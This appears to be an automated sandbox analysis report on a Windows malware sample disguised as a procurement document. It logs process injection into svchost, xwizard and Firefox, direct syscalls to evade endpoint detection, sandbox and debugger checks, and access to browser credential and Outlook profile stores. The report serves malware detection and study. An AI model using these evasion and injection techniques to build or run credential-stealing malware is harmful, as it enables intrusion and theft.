            Source: xwizard.exe, 00000004.00000003.64412184304.0000000003022000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000003043000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64412349655.0000000003043000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: xwizard.exe, 00000004.00000003.64420854491.0000000008030000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65196596495.000000000803C000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeReversingLabs: Detection: 27%
            Source: unknownProcess created: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"Jump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic file information: File size 1179648 > 1048576
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EIyKLgVzlk.exe, 00000003.00000002.65192008768.000000000028E000.00000002.00000001.01000000.00000004.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65192012128.000000000028E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeFile created: \acquisition of a conservative refrigerator.exe
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeFile created: \acquisition of a conservative refrigerator.exeJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeAPI/Special instruction interceptor: Address: 11134D4
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD144
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD604
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD764
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD324
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD364
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD004
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AFF74
            Source: C:\Windows\SysWOW64\xwizard.exeAPI/Special instruction interceptor: Address: 7FFC225AD864
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945952905.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932102423.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934597630.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63930276330.0000000001104000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933466408.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933878407.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932231287.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934304850.0000000001116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
            Source: C:\Windows\SysWOW64\xwizard.exeWindow / User API: threadDelayed 9852Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256Thread sleep count: 121 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256Thread sleep time: -242000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256Thread sleep count: 9852 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256Thread sleep time: -19704000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe TID: 1712Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\xwizard.exeLast function: Thread delayed
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: firefox.exe, 00000006.00000002.64526958402.0000022D27398000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: EIyKLgVzlk.exe, 00000005.00000002.65192936535.00000000013EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtQueryAttributesFile: Direct from: 0x77BC2D8CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtSetInformationThread: Direct from: 0x77BC2A6CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtCreateKey: Direct from: 0x77BC2B8CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtClose: Direct from: 0x77BC2A8C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtAllocateVirtualMemory: Direct from: 0x77BC480CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtWriteVirtualMemory: Direct from: 0x77BC482CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtProtectVirtualMemory: Direct from: 0x77BC2EBCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtCreateUserProcess: Direct from: 0x77BC363CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtQueryInformationProcess: Direct from: 0x77BC2B46Jump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtResumeThread: Direct from: 0x77BC2EDCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtOpenKeyEx: Direct from: 0x77BC2ABCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtDelayExecution: Direct from: 0x77BC2CFCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtQuerySystemInformation: Direct from: 0x77BC2D1CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtReadFile: Direct from: 0x77BC29FCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtAllocateVirtualMemory: Direct from: 0x77BC2B1CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtResumeThread: Direct from: 0x77BC35CCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtMapViewOfSection: Direct from: 0x77BC2C3CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtWriteVirtualMemory: Direct from: 0x77BC2D5CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtNotifyChangeKey: Direct from: 0x77BC3B4CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtSetInformationProcess: Direct from: 0x77BC2B7CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtProtectVirtualMemory: Direct from: 0x77BB7A4EJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtReadVirtualMemory: Direct from: 0x77BC2DACJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtAllocateVirtualMemory: Direct from: 0x77BC3BBCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtQueryInformationToken: Direct from: 0x77BC2BCCJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtOpenFile: Direct from: 0x77BC2CECJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtCreateFile: Direct from: 0x77BC2F0CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtSetInformationThread: Direct from: 0x77BB6319Jump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtAllocateVirtualMemory: Direct from: 0x77BC2B0CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtOpenSection: Direct from: 0x77BC2D2CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtQueryVolumeInformationFile: Direct from: 0x77BC2E4CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtDeviceIoControlFile: Direct from: 0x77BC2A0CJump to behavior
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeNtQuerySystemInformation: Direct from: 0x77BC47ECJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\xwizard.exeThread register set: target process: 32Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\xwizard.exeThread APC queued: target process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 914008Jump to behavior
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"Jump to behavior
